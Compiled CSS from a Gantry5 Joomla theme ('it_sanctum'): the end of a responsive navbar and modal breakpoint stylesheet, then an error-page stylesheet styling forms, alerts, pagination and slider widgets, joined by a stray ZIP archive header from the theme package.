  /* line 420, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-bottom {
    margin-top: 20px;
  }
  /* line 423, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top .navbar-inner, .navbar-fixed-bottom .navbar-inner {
    padding: 5px;
  }
  /* line 427, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .container {
    width: auto;
    padding: 0;
  }
  /* line 431, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .brand {
    padding-right: 10px;
    padding-left: 10px;
    margin: 0 0 0 -5px;
  }
  /* line 436, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse {
    clear: both;
  }
  /* line 439, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav {
    float: none;
    margin: 0 0 10px;
  }
  /* line 443, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li {
    float: none;
  }
  /* line 446, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a {
    margin-bottom: 2px;
  }
  /* line 449, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > .divider-vertical {
    display: none;
  }
  /* line 452, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav .nav-header {
    color: #777;
    text-shadow: none;
  }
  /* line 456, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a, .nav-collapse .dropdown-menu a {
    padding: 9px 15px;
    font-weight: bold;
    color: #777;
    border-radius: 0.1875rem;
  }
  /* line 463, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .btn {
    padding: 4px 10px 4px;
    font-weight: normal;
    border-radius: 0.1875rem;
  }
  /* line 468, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu li + li a {
    margin-bottom: 2px;
  }
  /* line 471, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a:hover, .nav-collapse .nav > li > a:focus, .nav-collapse .dropdown-menu a:hover, .nav-collapse .dropdown-menu a:focus {
    background-color: #f2f2f2;
  }
  /* line 477, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .nav > li > a, .navbar-inverse .nav-collapse .dropdown-menu a {
    color: #999;
  }
  /* line 481, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .nav > li > a:hover, .navbar-inverse .nav-collapse .nav > li > a:focus, .navbar-inverse .nav-collapse .dropdown-menu a:hover, .navbar-inverse .nav-collapse .dropdown-menu a:focus {
    background-color: #111;
  }
  /* line 487, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse.in .btn-group {
    padding: 0;
    margin-top: 5px;
  }
  /* line 491, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu {
    position: static;
    top: auto;
    left: auto;
    display: none;
    float: none;
    max-width: none;
    padding: 0;
    margin: 0 15px;
    background-color: transparent;
    border: none;
    border-radius: 0;
    box-shadow: none;
  }
  /* line 505, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .open > .dropdown-menu {
    display: block;
  }
  /* line 508, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu:before, .nav-collapse .dropdown-menu:after {
    display: none;
  }
  /* line 512, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu .divider {
    display: none;
  }
  /* line 515, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > .dropdown-menu:before, .nav-collapse .nav > li > .dropdown-menu:after {
    display: none;
  }
  /* line 519, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .navbar-form, .nav-collapse .navbar-search {
    float: none;
    padding: 10px 15px;
    margin: 10px 0;
    border-top: 1px solid #f2f2f2;
    border-bottom: 1px solid #f2f2f2;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  }
  /* line 528, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .navbar-form, .navbar-inverse .nav-collapse .navbar-search {
    border-top-color: #111;
    border-bottom-color: #111;
  }
  /* line 533, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .nav-collapse .nav.pull-right {
    float: none;
    margin-left: 0;
  }
  /* line 537, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse, .nav-collapse.collapse {
    height: 0;
    overflow: hidden;
  }
  /* line 542, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .btn-navbar {
    display: block;
  }
  /* line 545, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-static .navbar-inner {
    padding-right: 10px;
    padding-left: 10px;
  }
}
@media only all and (min-width: 60rem) {
  /* line 552, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse.collapse {
    height: auto !important;
    overflow: visible !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  /* line 3, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  .form-horizontal .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  /* line 9, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  .form-horizontal .controls {
    margin: 0;
  }
  /* line 14, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  [dir="rtl"] .form-horizontal .control-label {
    text-align: right;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal {
    position: fixed;
    top: 20px;
    right: 20px;
    left: 20px;
    width: auto;
    margin: 0;
  }
  /* line 10, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal.fade {
    top: -100px;
  }
  /* line 13, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal.fade.in {
    top: 20px;
  }
}
@media only all and (max-width: 30rem) {
  /* line 19, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal {
    top: 10px;
    right: 10px;
    left: 10px;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 27, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  /* line 28, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  .pull-right.item-image {
    margin-left: 0;
  }
  /* line 33, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  /* line 34, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  .pull-left.item-image {
    margin-right: 0;
  }
}
/*# sourceMappingURL=sanctum-joomla__offline.css.map */PK!��3�ԒԒ8it_sanctum/custom/css-compiled/sanctum-joomla__error.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.
 *
 * WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!
 *
 * For more information on modifying CSS, please read:
 *
 * http://docs.gantry.org/gantry5/configure/styles
 * http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

@charset "UTF-8";
legend {
  font-size: 1.3rem;
  line-height: 1.5;
}
legend small {
  font-size: 0.8rem;
}
.input-prepend > .add-on, .input-append > .add-on {
  line-height: 1.5;
}
.btn-group > .btn + .dropdown-toggle {
  box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1);
}
.btn-group.open .btn-primary.dropdown-toggle {
  background: #458334;
  color: #ffffff;
  box-shadow: inset -1px -1px 1px rgba(0, 0, 0, 0.15);
}
.dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a {
  background-image: none;
  background-color: #4f953b;
}
.btn-link {
  color: #4f953b;
}
#login-form {
  margin-bottom: 0;
}
#login-form #form-login-remember {
  margin: 20px 0 10px;
}
#login-form #form-login-remember input {
  margin: 0 5px 0 0;
}
#login-form ul.unstyled {
  margin: 20px 0 0;
}
#login-form ul.unstyled a {
  color: #282828;
}
#login-form ul.unstyled a:hover {
  color: #4f953b;
}
#login-form ul.unstyled a i {
  margin-right: 7px;
}
.nav.menu {
  margin: 0;
}
.nav.menu li {
  margin-bottom: 6.5px;
}
.nav.menu li:last-child {
  margin-bottom: 0;
}
.nav.menu li a {
  color: #282828;
}
.nav.menu li a:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 0.625rem;
}
.nav.menu li a:hover {
  color: #4f953b;
}
.nav.menu li span:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 0.625rem;
}
.nav.menu li ul {
  margin-top: 6.5px;
  margin-bottom: 6.5px;
}
.nav.menu li.current > a, .nav.menu li.current > span {
  color: #4f953b;
}
.well {
  background: transparent;
  border: 1px solid #dddddd;
  border-radius: 0;
  box-shadow: none;
  padding: 30px 30px 10px;
}
.login > form fieldset .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
.login > form fieldset .control-group #remember {
  margin-top: 10px;
}
@media only all and (max-width: 47.99rem) {
  .login > form fieldset .control-group #remember {
    width: auto;
  }
}
@media only all and (max-width: 47.99rem) {
  .login > form fieldset .control-group input {
    width: 100%;
  }
}
.logout .controls {
  margin-left: 0;
}
ul.nav-tabs.nav-stacked > li > a {
  border-radius: 0 !important;
  border: 1px solid #dddddd;
}
ul.nav-tabs.nav-stacked > li > a:hover {
  border: 1px solid #dddddd;
}
.registration #member-registration {
  margin-bottom: 0;
}
.registration #member-registration legend + .control-group {
  margin-top: 0;
}
.registration #member-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
@media only all and (max-width: 47.99rem) {
  .registration #member-registration .control-group input {
    width: 100%;
  }
}
.remind #user-registration, .reset #user-registration {
  margin-bottom: 0;
}
.remind #user-registration fieldset p, .reset #user-registration fieldset p {
  margin-top: 0;
}
.remind #user-registration .control-group .control-label, .reset #user-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
.profile > ul.btn-toolbar {
  margin-top: 0;
}
.profile #users-profile-core {
  margin-bottom: 20px;
}
.profile fieldset dl dt {
  text-align: left;
}
.profile-edit #member-profile {
  margin-bottom: 0;
}
.profile-edit #member-profile .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
.profile-edit #member-profile .control-group .chzn-container {
  padding-top: 8px;
}
.list-striped, .row-striped {
  border-top: 1px solid #dddddd;
}
.list-striped li, .list-striped dd, .row-striped .row, .row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
}
.list-striped li:nth-child(odd), .list-striped dd:nth-child(odd), .row-striped .row:nth-child(odd), .row-striped .row-fluid:nth-child(odd) {
  background-color: #fcfcfc;
}
.list-striped li:hover, .list-striped dd:hover, .row-striped .row:hover, .row-striped .row-fluid:hover {
  background-color: #f2f2f2;
}
.list-bordered, .row-bordered {
  border: 1px solid #dddddd;
}
.row-even, .row-odd {
  border-bottom: 1px solid #dddddd;
}
.row-even {
  background-color: #fcfcfc;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
blockquote {
  border-left: 5px solid #dddddd;
}
blockquote small {
  color: #c8c8c8;
}
blockquote.pull-right {
  border-right: 5px solid #dddddd;
}
legend {
  color: #333333;
}
legend small {
  color: #999999;
}
.input-prepend .chzn-container-single .chzn-single, .input-append .chzn-container-single .chzn-single {
  border-color: #dddddd;
}
.input-prepend .chzn-container-single .chzn-drop, .input-append .chzn-container-single .chzn-drop {
  border-color: #dddddd;
}
textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input {
  background-color: #ffffff;
  border: 1px solid #d5d5d5;
  box-shadow: none;
  padding: 10px;
  border-radius: 0;
  -webkit-transition: border 0.2s linear, box-shadow 0.2s linear;
  -moz-transition: border 0.2s linear, box-shadow 0.2s linear;
  transition: border 0.2s linear, box-shadow 0.2s linear;
}
textarea:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus, input[type="week"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus, .uneditable-input:focus {
  box-shadow: none;
}
#g-aside input, #g-aside textarea, #g-aside .uneditable-input, #g-sidebar input, #g-sidebar textarea, #g-sidebar .uneditable-input, #g-offcanvas input, #g-offcanvas textarea, #g-offcanvas .uneditable-input {
  width: 100%;
}
#g-aside input[type="file"], #g-aside input[type="image"], #g-aside input[type="submit"], #g-aside input[type="reset"], #g-aside input[type="button"], #g-aside input[type="radio"], #g-aside input[type="checkbox"], #g-sidebar input[type="file"], #g-sidebar input[type="image"], #g-sidebar input[type="submit"], #g-sidebar input[type="reset"], #g-sidebar input[type="button"], #g-sidebar input[type="radio"], #g-sidebar input[type="checkbox"], #g-offcanvas input[type="file"], #g-offcanvas input[type="image"], #g-offcanvas input[type="submit"], #g-offcanvas input[type="reset"], #g-offcanvas input[type="button"], #g-offcanvas input[type="radio"], #g-offcanvas input[type="checkbox"] {
  width: auto;
}
#g-header .search form, #g-navigation .search form {
  margin-bottom: 0;
}
#g-header .search input, #g-navigation .search input {
  margin-bottom: 0;
  border: 0;
}
.view-mailto #g-page-surround, .body-only #g-page-surround {
  box-shadow: none;
}
.nav-tabs.nav-dark {
  border-bottom: 1px solid #333;
  text-shadow: 1px 1px 1px #000;
}
.nav-tabs.nav-dark > li > a {
  color: #F8F8F8;
}
.nav-tabs.nav-dark > li > a:hover {
  border-color: #333 #333 #111;
  background-color: #777777;
}
.nav-tabs.nav-dark > .active > a, .nav-tabs.nav-dark > .active > a:hover {
  color: #ffffff;
  background-color: #555555;
  border: 1px solid #222;
}
.tip-wrap {
  color: #fff;
  background-color: #000;
}
.search span.highlight {
  background-color: #fcfcfc;
}
.img-polaroid {
  background-color: #ffffff;
  border: 1px solid rgba(0, 0, 0, 0.2);
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}
.muted {
  color: #999999;
}
a.muted:hover, a.muted:focus {
  color: #808080;
}
.alert {
  background-color: #f8f4ec;
  border-color: #eee4d2;
}
.alert a, .alert a:hover, .alert .alert-link, .alert .alert-link:hover {
  color: #a47e3c;
  font-weight: bold;
}
.alert a:hover, .alert a:hover:hover, .alert .alert-link:hover, .alert .alert-link:hover:hover {
  text-decoration: underline;
}
.alert, .text-warning {
  color: #c09853;
}
.alert h4 {
  color: #c09853 !important;
}
a.text-warning:hover, a.text-warning:focus {
  color: #b78c43;
}
.alert-success {
  color: #468847;
  background-color: #dfeedf;
  border-color: #c4e0c4;
}
.alert-success a, .alert-success a:hover, .alert-success .alert-link, .alert-success .alert-link:hover {
  color: #356635;
  font-weight: bold;
}
.alert-success a:hover, .alert-success a:hover:hover, .alert-success .alert-link:hover, .alert-success .alert-link:hover:hover {
  text-decoration: underline;
}
.text-success {
  color: #468847;
}
.alert-success h4 {
  color: #468847 !important;
}
a.text-success:hover, a.text-success:focus {
  color: #3d773e;
}
.alert-danger, .alert-error {
  color: #b94a48;
  background-color: #f6e7e7;
  border-color: #edd1d0;
}
.alert-danger a, .alert-danger a:hover, .alert-danger .alert-link, .alert-danger .alert-link:hover, .alert-error a, .alert-error a:hover, .alert-error .alert-link, .alert-error .alert-link:hover {
  color: #953b39;
  font-weight: bold;
}
.alert-danger a:hover, .alert-danger a:hover:hover, .alert-danger .alert-link:hover, .alert-danger .alert-link:hover:hover, .alert-error a:hover, .alert-error a:hover:hover, .alert-error .alert-link:hover, .alert-error .alert-link:hover:hover {
  text-decoration: underline;
}
.text-error {
  color: #b94a48;
}
.alert-danger h4, .alert-error h4 {
  color: #b94a48 !important;
}
a.text-error:hover, a.text-error:focus {
  color: #a74240;
}
.alert-info {
  color: #3a87ad;
  background-color: #e2eff5;
  border-color: #c7e0ec;
}
.alert-info a, .alert-info a:hover, .alert-info .alert-link, .alert-info .alert-link:hover {
  color: #2d6987;
  font-weight: bold;
}
.alert-info a:hover, .alert-info a:hover:hover, .alert-info .alert-link:hover, .alert-info .alert-link:hover:hover {
  text-decoration: underline;
}
.text-info {
  color: #3a87ad;
}
.alert-info h4 {
  color: #3a87ad !important;
}
a.text-info:hover, a.text-info:focus {
  color: #34789a;
}
.platform-content input {
  box-sizing: inherit;
}
.form-actions {
  background-color: transparent;
  border: none;
  margin: 0;
  padding: 0;
}
.element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
.contact > h3 {
  display: none;
}
.contact .contact-address {
  margin: 0;
}
.contact #contact-form {
  margin-bottom: 0;
}
.contact #contact-form fieldset > legend {
  font-size: 0.9rem;
  color: #282828;
  margin-bottom: 0;
}
.contact #contact-form.form-horizontal .control-label {
  text-align: left;
}
.contact #contact-form input, .contact #contact-form textarea {
  width: 100%;
}
@media only all and (max-width: 47.99rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
.contact #contact-form #jform_contact_email_copy {
  width: 10px;
}
.contact #contact-form label {
  margin-top: 3px;
}
.contact #contact-form #jform_contact_email_copy-lbl {
  margin-top: 0;
}
@media only all and (max-width: 47.99rem) {
  .contact #contact-form .form-actions {
    padding: 0;
  }
  .contact #contact-form .form-actions > button {
    display: block;
    width: 100%;
  }
}
.contact #contact-form.well {
  border: none;
  padding: 0;
  background: none;
}
ul.breadcrumb {
  margin: 6px 0 0;
  padding: 0;
  background: none;
  text-align: center;
}
@media only all and (max-width: 47.99rem) {
  ul.breadcrumb {
    margin: 0;
  }
}
ul.breadcrumb li {
  text-shadow: none;
}
ul.breadcrumb li .divider {
  display: none;
}
ul.breadcrumb li + li:after {
  content: "/ ";
  padding: 0 5px;
}
ul.breadcrumb li + li:last-child:after {
  content: none;
  padding: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-grid > .g-block:last-child ul.breadcrumb {
    text-align: center;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-grid > .g-block:first-child ul.breadcrumb {
    text-align: center;
  }
}
.blog .category-desc, .blog-featured .category-desc {
  margin: -10px 0 30px;
}
.blog .items-more ol, .blog-featured .items-more ol {
  padding-left: 0;
  margin: 0 0 60px 0;
}
.blog article.item, .blog-featured article.item {
  margin-bottom: 60px;
}
.item-page ul.pager {
  margin-bottom: 0;
}
article .item-image {
  margin: 20px 0;
}
.tag-category li h3 {
  margin: 10px 0;
}
.tag-category li h3 a {
  color: #282828;
}
.tag-category li h3 a:hover {
  color: #4f953b;
}
.tag-category form {
  margin-bottom: 0;
}
.g-article-header {
  position: relative;
  padding: 0;
}
.g-article-header > .icons {
  position: relative;
  right: 0;
  top: 32px;
  right: 15px;
}
.g-article-header > .icons .btn-group .btn {
  background: transparent !important;
  border: 0px solid #ffffff !important;
  padding: 0.3rem 0.6rem !important;
}
.g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
  color: #959595 !important;
  margin-right: 0px;
}
@media only all and (max-width: 47.99rem) {
  .g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
    margin-top: 5px;
  }
}
.g-article-header > .icons .btn-group .btn .caret {
  display: none;
}
.g-article-header > .icons .btn-group .btn:hover {
  color: #4f953b !important;
}
.g-article-header .page-header h2 {
  margin: 0 0 -10px 0;
}
.g-article-header .page-header h2 a {
  color: #282828;
}
.g-article-header .page-header h2 a:hover {
  color: #4f953b;
}
.readmore {
  margin: 0;
}
.readmore .btn span {
  display: none;
}
.tags {
  margin-bottom: 1.5rem;
}
.article-info {
  color: #959595;
  margin: 20px 0 0;
  background: transparent;
  border: 1px solid #dddddd;
  padding: 1rem 1.5rem;
}
.article-info a {
  color: #959595;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin: 0 20px 0 0;
}
.article-info dd i {
  margin-right: 5px;
}
@media only all and (max-width: 47.99rem) {
  .article-info {
    text-align: center;
  }
}
.content-category form {
  margin-bottom: 0;
}
.content-category .pagination {
  margin-bottom: 0;
}
.content-category .pagination > ul {
  margin-bottom: 0;
  box-shadow: none;
}
.content-category .pagination .counter {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .content-category .pagination .counter {
    float: none;
  }
}
.pagination {
  margin: 0;
}
.pagination ul {
  margin: 0;
  box-shadow: none;
}
.pagination ul > li > a, .pagination ul > li > span {
  color: inherit;
  padding: 0.675rem 1rem;
  margin-right: 5px;
  border: 1px solid #dddddd;
  border-radius: 0px !important;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
.pagination ul > li > a:hover, .pagination ul > li > span:hover {
  color: #ffffff;
  background: #4f953b;
  border-color: #4f953b;
}
.pagination ul > .active > a, .pagination ul > .active > span {
  color: #ffffff;
  background: #4f953b;
  border-color: #4f953b;
}
.pagination .counter {
  margin: 7px 0 0;
}
@media only all and (max-width: 47.99rem) {
  .pagination .counter {
    float: none;
  }
}
.pager li a {
  color: inherit;
  border: 1px solid inherit;
  background: transparent;
  border-radius: 0px;
  padding: 0.675rem 1.5rem;
}
.pager li a:hover {
  color: #ffffff;
  background: #4f953b;
  border-color: #4f953b;
}
.rev_slider_wrapper .tp-caption a.button {
  color: #ffffff;
}
.rev_slider_wrapper .tp-caption a.button.dark {
  margin-left: 10px;
}
.rev_slider_wrapper .tparrows:before {
  color: #FFFFFF;
  display: inline-block;
  font-family: FontAwesome, sans-serif;
  font-size: 20px;
  font-style: normal;
  font-weight: bold;
  margin-right: 0;
  margin-top: 2px;
  text-align: center;
  text-decoration: inherit;
  width: 35px;
}
.rev_slider_wrapper .tparrows {
  background: #000000;
  background: none repeat scroll 0 0 rgba(0, 0, 0, 0.4);
  border-radius: 5px;
  cursor: pointer;
  height: 35px;
  width: 35px;
  -webkit-transition: background 0.3s, opacity 0.3s;
  -moz-transition: background 0.3s, opacity 0.3s;
  transition: background 0.3s, opacity 0.3s;
}
.rev_slider_wrapper .tparrows:hover {
  color: #FFFFFF;
}
.rev_slider_wrapper .tp-leftarrow:before {
  content: "";
}
.rev_slider_wrapper .tp-rightarrow:before {
  content: "";
}
.rev_slider_wrapper .tparrows.tp-rightarrow:before {
  margin-left: 1px;
}
.rev_slider_wrapper .tparrows:hover {
  background: #000000;
}
.nssp2 .ns2-title {
  margin: 0 0 10px;
  font-size: 1.035rem;
  font-weight: normal;
}
.nssp2 .ns2-title a {
  color: #282828;
}
.nssp2 .ns2-title a:hover {
  color: #4f953b;
}
.nssp2 .ns2-introtext {
  margin: 0;
}
.nssp2 .ns2-social span {
  margin-left: 0 !important;
  margin-right: 10px;
}
.nssp2 .ns2-rating {
  margin-bottom: 10px;
}
.nssp2 .ns2-links {
  margin-top: 10px;
  font-size: 0.81rem;
}
.nssp2 .ns2-links .ns2-created {
  margin-right: 15px;
}
.nssp2 .ns2-links .ns2-created:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 2px;
}
.nssp2 .ns2-links .ns2-author {
  margin-right: 15px;
}
.nssp2 .ns2-links .ns2-author:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 2px;
}
.nssp2 .ns2-links .ns2-category {
  margin-right: 15px;
}
.nssp2 .ns2-links .ns2-category a {
  color: #959595;
}
.nssp2 .ns2-links .ns2-category a:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 2px;
}
.nssp2 .ns2-links .ns2-category a:hover {
  color: #4f953b;
}
.nssp2 .ns2-links .ns2-comments {
  margin: 0;
  margin-right: 15px;
  color: #959595;
  background: none;
  padding: 0;
  font-size: inherit;
}
.nssp2 .ns2-links .ns2-comments:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 6px;
}
.nssp2 .ns2-links .ns2-comments:hover {
  color: #4f953b;
}
.nssp2 .ns2-links .ns2-hits {
  margin-right: 15px;
  background: none;
  padding: 0;
  color: #959595;
  font-size: inherit;
}
.nssp2 .ns2-links .ns2-hits:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 6px;
}
.nssp2 .ns2-links .ns2-readmore {
  margin: 0;
  margin-right: 15px;
  color: #959595;
}
.nssp2 .ns2-links .ns2-readmore span {
  background: none;
  padding: 0;
  font-size: inherit;
}
.nssp2 .ns2-links .ns2-readmore:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 6px;
}
.nssp2 .ns2-links .ns2-readmore:hover {
  color: #4f953b;
}
.nssp2 .ns2-page-inner-custom {
  overflow: hidden;
}
.nssp2 .ns2-page-inner-custom > div {
  margin-bottom: 30px;
}
.nssp2 .ns2-page-inner-custom > div:last-child {
  margin-bottom: 0;
}
.nssp2 .ns2-image-link {
  position: relative;
}
.nssp2 .ns2-image-link:hover .ns2-image-overlay {
  opacity: 1;
}
@media only all and (max-width: 30rem) {
  .nssp2 .ns2-image-link {
    margin-bottom: 15px;
  }
}
.nssp2 .ns2-image-overlay {
  background: rgba(0, 0, 0, 0.5);
  color: #ffffff;
  padding: 20px;
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  opacity: 0;
  -webkit-transition: opacity 0.3s;
  -moz-transition: opacity 0.3s;
  transition: opacity 0.3s;
}
.nssp2 .ns2-image-overlay:before {
  font-size: 25px;
  height: 25px;
  width: 25px;
  margin-left: -11px;
  margin-top: -17px;
  color: #ffffff;
  position: absolute;
  left: 50%;
  top: 50%;
  content: "";
  font-family: FontAwesome;
}
.nssp2 .ns2-wrap {
  position: relative;
}
.nssp2 .ns2-wrap .ns2-art-controllers {
  position: absolute;
  top: -58px;
  right: 0;
}
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-play, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-play, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pause, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pause, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span {
  background: none;
  text-indent: 0;
  height: auto;
  width: auto;
}
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span {
  color: #959595;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span.active, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span.active {
  color: #c8c8c8;
}
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next {
  padding: 5px 10px;
  background: #4f953b;
  color: #ffffff;
  border-radius: 3px;
  font-size: 11px;
  margin-top: -4px;
  margin-right: 0;
  margin-left: 5px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next i {
  vertical-align: middle;
}
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next:hover {
  background: #282828;
}
.footer .nssp2 .ns2-title {
  font-size: 0.9rem;
  margin: 0;
}
.footer .ns2-page-inner-custom > div {
  margin: 0;
  border-bottom: 1px solid #353535;
}
.footer .ns2-page-inner-custom > div:last-child {
  border: none;
}
.footer .ns2-page-inner-custom > div:last-child .ns2-column > div {
  padding-bottom: 0 !important;
}
